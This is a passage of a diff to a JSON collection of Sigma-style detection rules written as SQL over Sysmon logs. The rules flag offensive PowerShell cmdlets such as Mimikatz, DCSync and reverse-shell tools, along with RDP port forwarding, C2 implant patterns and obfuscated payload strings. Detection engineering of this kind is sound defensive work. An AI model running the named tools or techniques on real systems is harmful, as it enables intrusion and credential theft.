LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR 
CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE 
'%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_register_app.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Obfuscated IP Via CLI", - "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", - "status": "experimental", - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) 
via commandline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", + "status": "test", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.discovery" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Suspicious Copy From or To System32", + "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "status": "test", + "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to 
a different location with a different name in order to bypass detections based on locations\n", + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1528", + "attack.defense_evasion", "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_susp_copy_system32.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", "status": "experimental", - "description": "Detects suspicious sub 
processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", - "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "status": "test", + "description": "Detects commands that temporarily turn off Volume Snapshots", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": 
"proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", + "status": "experimental", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "SQL Client Tools PowerShell Session Detection", - "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "title": "Potential Network Sniffing Activity Using Network Tools", + "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", "status": "test", - "description": "This rule detects 
execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", - "author": "Agro (@agro_sev) oscd.communitly", + "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.discovery", + "attack.t1040" ], "falsepositives": [ - "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." 
+ "Legitimate administration activity to troubleshoot network issues" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR Image LIKE '%\\\\windump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" + "filename": "proc_creation_win_network_sniffing.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE 
'%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "title": "Renamed FTP.EXE Execution", + "id": "277a4393-446c-449a-b0ed-7fdc7795244c", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1059", + "attack.defense_evasion", + 
"attack.t1202" ], - "level": "high", + "falsepositives": [ + "Unknown" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'ftp.exe' AND NOT (Image LIKE '%\\\\ftp.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_renamed_ftp.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "title": "Detected Windows Software Discovery", + "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_reg_software_discovery.yml" }, { - "title": "Potential Recon Activity Using Wevtutil", - "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", - "status": "experimental", - "description": "Detects usage of the wevtutil utility to perform reconnaissance", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "InfDefaultInstall.exe .inf Execution", + "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "status": "test", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", + "author": "frack113", "tags": [ - "attack.discovery" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate usage of the utility by administrators to query the event log" + "Unknown" ], "level": "medium", "rule": [ - "SELECT 
